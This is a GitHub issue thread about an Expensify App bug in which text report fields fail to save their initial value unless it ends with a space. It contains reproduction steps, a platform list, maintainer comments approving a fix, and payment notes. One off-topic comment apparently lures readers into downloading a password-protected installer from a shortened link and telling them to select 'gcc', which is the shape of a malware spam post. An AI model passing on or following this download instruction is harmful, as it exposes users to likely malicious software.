### ISSUE TITLE
[$250] Report fields - Unable to save content in text report field if there is no space at the end

### ISSUE THREAD

**Issue by IuliiaHerets** [Expensify/App#48106]
If you haven’t already, check out our [contributing guidelines](https://github.com/Expensify/ReactNativeChat/blob/main/contributingGuides/CONTRIBUTING.md) for onboarding and email contributors@expensify.com to request to join our Slack channel!
___

**Version Number:** 9.0.25-3
**Reproducible in staging?:** Y
**Reproducible in production?:** N 
**Email or phone of affected tester (no customers):** applausetester+kh05081@applause.expensifail.com
**Issue reported by:** Applause Internal Team

## Action Performed:
1. Go to staging.new.expensify.com
2. Go to workspace settings > Report fields.
3. Click Add field.
4. Create a text type report field, without initial value.
5. Click on the added text type report field.
6. Click Initial value.
7. Enter anything without space at the end of text and save it.
8. Note that the content is not saved when there is no space at the end.
9. Click Initial value.
10. Enter anything, followed by a space, and save it.
11. Note that the content is saved when there is space at the end.

## Expected Result:
Content without space at the end should be saved.

## Actual Result:
Content without space at the end is not saved when editing text type report field.
This issue only happens with the created text type report field, and not while the report field is being created.

## Workaround:
Unknown

## Platforms:

- [x] Android: Native
- [x] Android: mWeb Chrome
- [x] iOS: Native
- [x] iOS: mWeb Safari
- [x] MacOS: Chrome / Safari
- [x] MacOS: Desktop

## Screenshots/Videos

https://github.com/user-attachments/assets/b3e1eef5-6957-44db-ab82-6577b24e1faa

</details>

[View all open jobs on GitHub](https://github.com/Expensify/App/issues?q=is%3Aopen+is%3Aissue+label%3A%22Help+Wanted%22)

<details><summary>Upwork Automation - Do Not Edit</summary>
    <ul>
        <li>Upwork Job URL: https://www.upwork.com/jobs/~016970107b81b06f81</li>
        <li>Upwork Job ID: 1828482902901740534</li>
        <li>Last Price Increase: 2024-08-27</li>
<li>Automatic offers: </li>
<ul>
<li>cretadn22 | Contributor | 103705877</li>
<li>ishpaul777 | Contributor | 103705905</li>
</ul></li>
    </ul>
</details>

<details><summary>Issue Owner</summary>Current Issue Owner: @ishpaul777</details>

**Comment by IuliiaHerets** [comment]
We think that this bug might be related to #wave-control

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by chiragsalian** [comment]
Nice, your solution LGTM, how quickly can you push up a PR for this @cretadn22? Asking cause its hourly. So the sooner the better.

**Comment by chiragsalian** [comment]
oops i didnt mean to unassign @ishpaul777 earlier. I think that was some race condition when i added you.
But yeah since this is a blocker for deploy I'm fine with skipping C+ for this.

**Comment by chiragsalian** [comment]
but hey @ishpaul777, if you are around and available to help out I'll gladly accept the help 🙂 I'd just like this to be addressed soon so it doesn't block deploy.

**Comment by chiragsalian** [comment]
Tested on staging web and it LGTM. Removing blocker label and checking it off the checklist.

**Comment by dylanexpensify** [comment]
Payment summary:

Contributor: @cretadn22 $250 
Contributor+: @ishpaul777 $250 

Please apply/request!

**Comment by dylanexpensify** [comment]
paid!
